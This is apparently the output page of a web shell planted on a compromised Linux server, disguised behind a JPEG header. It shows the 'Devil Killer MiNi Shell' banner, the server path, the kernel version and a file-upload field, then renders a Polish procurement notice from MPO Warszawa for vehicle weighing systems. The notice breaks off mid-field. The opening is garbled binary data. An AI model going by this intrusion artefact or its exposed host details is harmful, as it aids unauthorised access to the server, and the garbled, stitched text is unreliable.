JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241218/0066094501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż fabrycznie nowych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego w pojazdach do zbiórki odpadów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKIE PRZEDSIĘBIORSTWO OCZYSZCZANIA W M. ST. WARSZAWIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015314451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Obozowa 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-161</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 3910 100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@mpo.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mpo.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> usługi komunalne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż fabrycznie nowych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego w pojazdach do zbiórki odpadów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fceed647-71e3-4469-984a-62abfc3d5b9d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00660945</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mpowarszawa.ezamawiajacy.pl/pn/mpowarszawa/demand/180067/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mpowarszawa.ezamawiajacy.pl/pn/mpowarszawa/demand/180067/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, za pośrednictwem Platformy pod adresem: https://mpowarszawa.ezamawiajacy.pl/pn/mpowarszawa/demand/180067/notice/public/details <br/>2.	Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy.<br/>3.	W celu bezproblemowej pracy z Platformą, Wykonawca powinien posiadać co najmniej:<br/>3.1.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>3.2.	komputer klasy PC lub MAC, spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>3.3.	włączoną obsługę JavaScript;<br/>3.4.	zainstalowany program AcrobatReader lub inny obsługujący pliki w formacie .pdf.;<br/>3.5.	zainstalowaną dowolną przeglądarkę internetową w wersji wspieranej przez producenta, obsługującą TLS 1.2.<br/>4. Dopuszczalny format kwalifikowanego podpisu elektronicznego:<br/>- dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>- jeżeli w wyniku podpisywania kwalifikowanym podpisem elektronicznym pliku w formacie innym niż „pdf&#34; zostanie utworzony dodatkowy plik z podpisem, Wykonawca jest zobowiązany przekazać Zamawiającemu oba pliki (plik podpisywany i plik z podpisem),<br/>- Zamawiający zaleca, aby kwalifikowany podpis elektroniczny, którym posługuje się Wykonawca był podpisem wydanym na terenie Rzeczpospolitej Polskiej, bądź innych krajów należących do Unii Europejskiej.<br/>5.	Dopuszczalny format podpisu osobistego:<br/>−	dokumenty w formacie „pdf” lub „xml” zaleca się podpisywać podpisem wewnętrznym (otoczonym),<br/>−	dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>6.	Dopuszczalny format podpisu zaufanego:<br/>−	wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”.<br/>7.	Obsługiwane przez Platformę formaty przesyłanych danych, tj. plików o wielkości do 2 GB w txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>8. Sposób porozumiewania się Zamawiającego z Wykonawcami został opisany w pkt. 5 Części I SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny został określony w pkt. 28 Części I SWZ oraz w załączniku do Części IV SWZ – Projektowane postanowienia umowy (wzór umowy).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.27.44.2024.MC</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia w zakresie Zadania 1 obejmuje dostawę i montaż na maksymalnie 4 szt. pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego. Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 1: Dostawę i montaż na 3 szt. pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego.<br/>2.	Pod pojęciem dynamicznego systemu wagowego (dalej system wagowy, system ważenia) należy rozumieć wagę automatyczną dla pojedynczych ładunków klasy Y (b): komputer wagowy, czujniki pomiarowe, czujniki wyzwalające, system wykrycia obecności pojemnika, okablowanie łączące czujniki z komputerem, elementy mocujące. Podstawową częścią składową systemu jest komputer wagowy, do którego podłączone zostaną sygnały z powyższych czujników. Ilość i typ czujników wyzwalających niezbędnych do prawidłowej pracy systemu wagowego niezależnie od typu urządzenia załadowczego zobowiązany jest określić Wykonawca. <br/>3.	Wykonawca jest zobligowany do dostosowania liczby czujników pomiarowych oraz pomocniczych do modelu oraz wersji zabudowy, na której zamontowany zostanie system. Zamawiający informuje, że system wagowy będzie montowany na:<br/> Zadanie 1 – pojazdach z zabudową bezpylną o pojemności ładunkowej 7-11 m3. Pojazdy wyposażone w urządzenie załadowcze zgodnie z normą PN-EN 1501-5:2021-08 (lub równoważną), dostosowane do współpracy z pojemnikami od 120 l do 1100 l, wyprodukowanymi zgodnie z normą PN-EN840 lub równoważną. Zabudowa (każda odrębnie) posiada znak CE.<br/>4. Przedmiot zamówienia obejmuje: <br/>a)	dostawę i montaż fabrycznie nowych systemów wagowych na pojazdach bezpylnych, <br/>b)	ocenę zgodności każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub Okręgowy Urząd Miar (OUM) lub instytucję równoważną upoważnioną do poświadczania dokonania legalizacji, <br/>c)	legalizację ponowną każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub <br/>Okręgowy Urząd Miar (OUM), <br/>d)	szkolenia w zakresie przewidzianym przez Zamawiającego, <br/>e)	usługę serwisową przez okres równy okresowy gwarancji. <br/>4. Montowane na pojazdach systemy wagowe (systemy ważenia) (każdy odrębnie) muszą być fabrycznie nowe, wyprodukowane nie wcześniej niż w 2023 roku. <br/>5. Wykonawca udzieli Zamawiającemu gwarancji w wymiarze 36 miesięcy w odniesieniu do zainstalowanego systemu wagowego dla każdego pojazdu, a okres gwarancji w odniesieniu do zainstalowanego systemu wagowego dla każdego z pojazdów rozpocznie się z chwilą podpisania bezusterkowego protokołu obioru ilościowo - jakościowego dla danego pojazdu. <br/>6. Oferowany przedmiot zamówienia nie może być rozwiązaniem prototypowym oraz musi być wykorzystany na przynajmniej 5 pojazdach bezpylnych w warunkach rzeczywistego odbioru odpadów.<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się w Części II SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42923110-6 - Wagi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 1: Dostawę i montaż na 3 szt. pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego.<br/>Zamawiający zastrzega sobie prawo do realizacji pozostałego zakresu zamówienia, tj.: Zadanie 1: Dostawę i montaż na pojeździe bezpylnym fabrycznie nowego dynamicznego systemu wagowego wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego w ilości 1 szt., <br/>- do jego maksymalnej wielkości określonej powyżej na zasadach prawa opcji. Skorzystanie z prawa opcji uzależnione będzie od decyzji Zamawiającego. <br/><br/>Zamawiający przewiduje wykorzystanie prawa opcji w terminie 360 dni od zawarcia umowy w następujących sytuacjach (kiedy zajdzie co najmniej jedna z nich): <br/>- gdy nastąpi awaria systemu wagowego obecnie zainstalowanego i użytkowanego na pojeździe bezpylnym eksploatowanym przez Zamawiającego i konieczna będzie jego wymiana na nowy, <br/>- gdy nastąpi zwiększenie floty pojazdów bezpylnych. <br/><br/>Zamawiający, każdorazowo na co najmniej trzy dni kalendarzowe przed złożeniem zamówienia w ramach prawa opcji (oddzielnie dla każdego zadania), poinformuje o tym fakcie Wykonawcę pisemnie.<br/><br/>Uprawnionym do złożenia zamówienia w ramach prawa opcji w imieniu Zamawiającego jest koordynator umowy bądź osoba stosownie upoważniona przez Zamawiającego. W razie skorzystania z prawa opcji, na Wykonawcę nałożony w ten sposób zostanie obowiązek realizacji zamówienia, na warunkach zawartej umowy, bez konieczności negocjacji między Stronami. <br/><br/>Skorzystanie z prawa opcji polegać będzie na realizacji zamówienia częściowego przedmiotu zamówienia po cenie jednostkowej zaproponowanej przez Wykonawcę w ofercie. <br/><br/>Przedmiotowa deklaracja nie dotyczy przypadku odstąpienia od umowy lub rozwiązania umowy lub jej zakończenia z jakiejkolwiek przyczyny przed upływem terminu, na jaki została zawarta, w tym w przypadkach określonych w § 6 umowy. <br/><br/>Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji (dostawy, montażu i oceny zgodności)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia w zakresie Zadania 2 obejmuje dostawę i montaż na maksymalnie 3 szt. pojazdów bezpylnych<br/>fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego.<br/>Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 2: Dostawę i montaż na 2 szt.<br/>pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego.<br/>2. Pod pojęciem dynamicznego systemu wagowego (dalej system wagowy, system ważenia) należy rozumieć wagę<br/>automatyczną dla pojedynczych ładunków klasy Y (b): komputer wagowy, czujniki pomiarowe, czujniki wyzwalające, system<br/>wykrycia obecności pojemnika, okablowanie łączące czujniki z komputerem, elementy mocujące. Podstawową częścią<br/>składową systemu jest komputer wagowy, do którego podłączone zostaną sygnały z powyższych czujników. Ilość i typ<br/>czujników wyzwalających niezbędnych do prawidłowej pracy systemu wagowego niezależnie od typu urządzenia<br/>załadowczego zobowiązany jest określić Wykonawca.<br/>3. Wykonawca jest zobligowany do dostosowania liczby czujników pomiarowych oraz pomocniczych do modelu oraz wersji<br/>zabudowy, na której zamontowany zostanie system. Zamawiający informuje, że system wagowy będzie montowany na:<br/>Zadanie 2 – pojazdach z zabudową bezpylną o pojemności ładunkowej 7-11 m3. Pojazdy wyposażone w urządzenie załadowcze zgodnie z normą PN-EN 1501-5:2021-08 (lub równoważną), dostosowane do współpracy z pojemnikami od 120 l do 1100 l, wyprodukowanymi zgodnie z normą PN-EN840 lub równoważną. Zabudowa (każda odrębnie) posiada znak CE. <br/>4. Przedmiot zamówienia obejmuje:<br/>a) dostawę i montaż fabrycznie nowych systemów wagowych na pojazdach bezpylnych,<br/>b) ocenę zgodności każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub Okręgowy Urząd Miar (OUM)<br/>lub instytucję równoważną upoważnioną do poświadczania dokonania legalizacji,<br/>c) legalizację ponowną każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub<br/>Okręgowy Urząd Miar (OUM),<br/>d) szkolenia w zakresie przewidzianym przez Zamawiającego,<br/>e) usługę serwisową przez okres równy okresowy gwarancji.<br/>4. Montowane na pojazdach systemy wagowe (systemy ważenia) (każdy odrębnie) muszą być fabrycznie nowe,<br/>wyprodukowane nie wcześniej niż w 2023 roku.<br/>5. Wykonawca udzieli Zamawiającemu gwarancji w wymiarze 36 miesięcy w odniesieniu do zainstalowanego systemu<br/>wagowego dla każdego pojazdu, a okres gwarancji w odniesieniu do zainstalowanego systemu wagowego dla każdego z<br/>pojazdów rozpocznie się z chwilą podpisania bezusterkowego protokołu obioru ilościowo - jakościowego dla danego<br/>pojazdu.<br/>6. Oferowany przedmiot zamówienia nie może być rozwiązaniem prototypowym oraz musi być wykorzystany na<br/>przynajmniej 5 pojazdach bezpylnych w warunkach rzeczywistego odbioru odpadów.<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się w Części II SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42923110-6 - Wagi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 2: Dostawę i montaż na 2<br/>szt. pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami<br/>wymaganymi przez Zamawiającego.<br/>Zamawiający zastrzega sobie prawo do realizacji pozostałego zakresu zamówienia, tj.: Zadanie 2: Dostawę i montaż na<br/>pojeździe bezpylnym fabrycznie nowego dynamicznego systemu wagowego wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego w ilości 1 szt.,<br/>- do jego maksymalnej wielkości określonej powyżej na zasadach prawa opcji. Skorzystanie z prawa opcji uzależnione<br/>będzie od decyzji Zamawiającego.<br/><br/>Zamawiający przewiduje wykorzystanie prawa opcji w terminie 360 dni od zawarcia umowy w następujących sytuacjach<br/>(kiedy zajdzie co najmniej jedna z nich):<br/>- gdy nastąpi awaria systemu wagowego obecnie zainstalowanego i użytkowanego na pojeździe bezpylnym<br/>eksploatowanym przez Zamawiającego i konieczna będzie jego wymiana na nowy,<br/>- gdy nastąpi zwiększenie floty pojazdów bezpylnych.<br/><br/>Zamawiający, każdorazowo na co najmniej trzy dni kalendarzowe przed złożeniem zamówienia w ramach prawa opcji<br/>(oddzielnie dla każdego zadania), poinformuje o tym fakcie Wykonawcę pisemnie.<br/><br/>Uprawnionym do złożenia zamówienia w ramach prawa opcji w imieniu Zamawiającego jest koordynator umowy bądź osoba<br/>stosownie upoważniona przez Zamawiającego. W razie skorzystania z prawa opcji, na Wykonawcę nałożony w ten sposób<br/>zostanie obowiązek realizacji zamówienia, na warunkach zawartej umowy, bez konieczności negocjacji między Stronami.<br/><br/>Skorzystanie z prawa opcji polegać będzie na realizacji zamówienia częściowego przedmiotu zamówienia po cenie<br/>jednostkowej zaproponowanej przez Wykonawcę w ofercie.<br/><br/>Przedmiotowa deklaracja nie dotyczy przypadku odstąpienia od umowy lub rozwiązania umowy lub jej zakończenia z<br/>jakiejkolwiek przyczyny przed upływem terminu, na jaki została zawarta, w tym w przypadkach określonych w § 6 umowy.<br/>Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie<br/>przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w<br/>stosunku do Zamawiającego; <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji (dostawy, montażu i oceny zgodności)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty 